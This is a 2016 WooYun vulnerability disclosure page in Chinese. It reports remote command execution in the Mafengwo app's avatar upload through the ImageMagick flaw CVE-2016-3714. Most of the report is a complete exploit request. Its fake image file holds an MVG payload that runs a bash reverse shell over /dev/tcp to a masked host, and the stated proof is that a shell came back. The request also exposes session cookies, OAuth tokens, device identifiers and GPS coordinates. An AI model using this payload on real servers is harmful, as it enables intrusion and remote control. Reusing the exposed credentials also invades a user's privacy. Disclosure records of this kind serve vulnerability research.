马蜂窝某站远程命令执行 | wooyun-2016-0205493| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205493

漏洞标题：马蜂窝某站远程命令执行

漏洞作者：路人甲

提交时间：2016-05-05 22:20

修复时间：2016-06-19 23:00

公开时间：2016-06-19 23:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-05：细节已通知厂商并且等待厂商处理中
2016-05-05：厂商已经确认，细节仅向厂商公开
2016-05-15：细节向核心白帽子及相关领域专家公开
2016-05-25：细节向普通白帽子公开
2016-06-04：细节向实习白帽子公开
2016-06-19：细节向公众公开

简要描述：

详细说明：

目标：蚂蜂窝IOS APP
头像上传地方存在CVE-2016-3714 - ImageMagick 命令执行分析

POST https://m.mafengwo.cn/nb/public/xauth_change_user.php HTTP/1.1
Host: m.mafengwo.cn
Content-Type: multipart/form-data; boundary=Boundary+454EDE5BD920AC77
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ge39jptbg3r1hujdm9bhgqps55; __idfa=564443CC-9189-42C1-9CC9-0922116AD5C4; __idfv=CA34ED38-8E5B-4526-ADC2-201F233A5707; __mfwuuid=a811fb2e-75d5-fbb3-07c4-23a20157abf8; __openudid=34c68951fec87de860a9802862152f33442f8c37; mfw_uid=91729966; mfw_uuid=572b4a14-f864-0900-2f51-39ea5fc6ed2c; oad_n=a%3A3%3A%7Bs%3A3%3A%22oid%22%3Bi%3A2581%3Bs%3A2%3A%22dm%22%3Bs%3A13%3A%22m.mafengwo.cn%22%3Bs%3A2%3A%22ft%22%3Bs%3A19%3A%222016-05-05+21%3A26%3A44%22%3B%7D
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: TravelGuideMdd/7.4.4 (iPhone; iOS 9.3.1; Scale/2.00),Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 mfwappcode/cn.mafengwo.www mfwappver/7.4.4 mfwsdk/20160401 mfwjssdk/0.1
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 2731
Accept-Webp: 1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_code"
cn.mafengwo.www
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_ver"
7.4.4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="channel_id"
App Store
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_token"
95d871b76de2867dc8723af43a258c990fc6c6f5a565fccc20410adcd4e73f23
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_type"
ios
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="hardware_model"
iPhone8,1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfa"
564443CC-9189-42C1-9CC9-0922116AD5C4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfv"
CA34ED38-8E5B-4526-ADC2-201F233A5707
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="mfwsdk_ver"
20160401
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lat"
22.614055
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lng"
114.035890
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_consumer_key"
4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_nonce"
841a666f5d33a774deab83527c05188c
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature"
eL4MWstOj/x9mADziX8rlQHsgA0=
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature_method"
HMAC-SHA1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_timestamp"
1462455168
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_token"
91729966_778cee2f668645fee3e66a124d659eae
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_version"
1.0
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="open_udid"
34c68951fec87de860a9802862152f33442f8c37
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="screen_scale"
2
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="sys_ver"
9.3.1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="time_offset"
480
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="uid"
91729966
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="x_auth_mode"
client_auth
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="ulogo"; filename="ulogo"
Content-Type: image/jpeg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2015 0>&1")'
pop graphic-context
--Boundary+454EDE5BD920AC77--

漏洞证明：

反弹shell

修复方案：

请多指教~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-05-05 22:54

厂商回复：

谢谢，我们马上处理

漏洞评价：

评价

2016-05-05 23:04 | toomi ( 路人 | Rank:12 漏洞数:4 | 小菜一枚)

今晚好多人都要加班啊。。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205493

漏洞标题：马蜂窝某站远程命令执行

相关厂商：蚂蜂窝

漏洞作者：路人甲

提交时间：2016-05-05 22:20

修复时间：2016-06-19 23:00

公开时间：2016-06-19 23:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205493

漏洞标题：马蜂窝某站远程命令执行

相关厂商：蚂蜂窝

漏洞作者： 路人甲

提交时间：2016-05-05 22:20

修复时间：2016-06-19 23:00

公开时间：2016-06-19 23:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0205493"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云